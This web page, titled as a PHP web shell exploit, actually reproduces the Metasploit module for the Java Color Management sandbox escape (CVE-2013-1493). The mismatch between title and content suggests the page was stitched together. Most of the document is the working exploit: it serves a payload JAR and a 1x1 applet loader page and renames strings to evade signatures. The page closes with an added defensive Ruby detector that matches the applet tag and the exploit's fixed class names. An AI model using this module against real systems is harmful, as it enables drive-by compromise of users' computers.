STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled exploit classes shipped with the framework under
  # data/exploits/cve-2013-1493. Only the applet entry class (Init) gets a
  # randomised name; Leak, MyBufferedImage and MyColorSpace keep their names.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Replace the literal "Init" (same length) so the class name and the
    # class-file references to it stay consistent.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Three URI shapes: "*.jar" serves the weaponised applet JAR, a trailing
  # "/" serves the loader page, anything else is redirected to the loader.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Start from the payload JAR and add the exploit classes to it.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the default "metasploit"/"Payload" strings in entry names and
      # entry contents (same-length replacements keep class-file offsets valid).
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Loader page: a 1x1 applet pointing at a randomly named JAR; the JAR name
  # only has to match the /\.jar$/ branch above.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
```
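The module above randomises the applet entry-class name and the "metasploit"/"Payload" strings, but two things stay fixed: the loader page always carries a 1x1 applet whose archive is an 8-letter random .jar and whose code attribute is a 4-letter random .class, and the JAR always contains Leak.class, MyBufferedImage.class and MyColorSpace.class under their original names. The following is an added example written for the defender's side, not part of the Metasploit module or of the original post: it checks a served HTML page and a JAR's entry list against exactly those invariants. The function names and the sample HTML/JAR listings are constructed for this illustration.

```ruby
# Added detection example (not from the Metasploit module above).
# Matches the two wire artifacts the module cannot randomise.

# Shape of the <applet> tag emitted by generate_html: rand_text_alpha(8) for
# the JAR, rand_text_alpha("Init".length) == 4 letters for the class.
APPLET_RE = /<applet\s+archive="(?<jar>[A-Za-z]{8})\.jar"\s+code="(?<cls>[A-Za-z]{4})\.class"\s+width="1"\s+height="1">/

# Class names the module adds to the JAR unchanged (only Init is renamed).
FIXED_JAR_CLASSES = %w[Leak.class MyBufferedImage.class MyColorSpace.class].freeze

# Returns {jar:, klass:} when the page carries the module's applet tag, else nil.
def match_cmm_applet(html)
  m = APPLET_RE.match(html)
  return nil unless m
  { jar: "#{m[:jar]}.jar", klass: "#{m[:cls]}.class" }
end

# Subset of the fixed exploit class names present in a JAR's entry list
# (order follows the entry list, as Array#& does).
def cmm_jar_indicators(entry_names)
  entry_names & FIXED_JAR_CLASSES
end

# Two or more of the fixed names is a strong hit regardless of the
# randomised Init / metasploit / Payload strings.
def cmm_jar?(entry_names)
  cmm_jar_indicators(entry_names).size >= 2
end

# Constructed samples: what the module would serve, and a benign applet page.
SAMPLE_EXPLOIT_HTML = %Q|<html><head><title>Loading, Please Wait...</title></head><body><center><p>Loading, Please Wait...</p></center><applet archive="kQzPwTrL.jar" code="bXcV.class" width="1" height="1"></applet></body></html>|
SAMPLE_BENIGN_HTML  = %Q|<html><body><applet archive="game.jar" code="Main.class" width="640" height="480"></applet></body></html>|
# Constructed JAR listings; the renamed payload package/class are made-up names.
SAMPLE_EXPLOIT_JAR = %w[META-INF/MANIFEST.MF bXcV.class Leak.class MyBufferedImage.class MyColorSpace.class qrtyuiopas/Asdfghj.class]
SAMPLE_BENIGN_JAR  = %w[META-INF/MANIFEST.MF Main.class]

if __FILE__ == $0
  p match_cmm_applet(SAMPLE_EXPLOIT_HTML)   # {:jar=>"kQzPwTrL.jar", :klass=>"bXcV.class"}
  p match_cmm_applet(SAMPLE_BENIGN_HTML)    # nil
  p cmm_jar?(SAMPLE_EXPLOIT_JAR)            # true
  p cmm_jar?(SAMPLE_BENIGN_JAR)             # false
end
```

The HTML check on its own is only a weak signal (any tiny applet with an 8-letter archive name would match), so pair it with the JAR entry check, which survives the module's string renaming because those three class names are never touched.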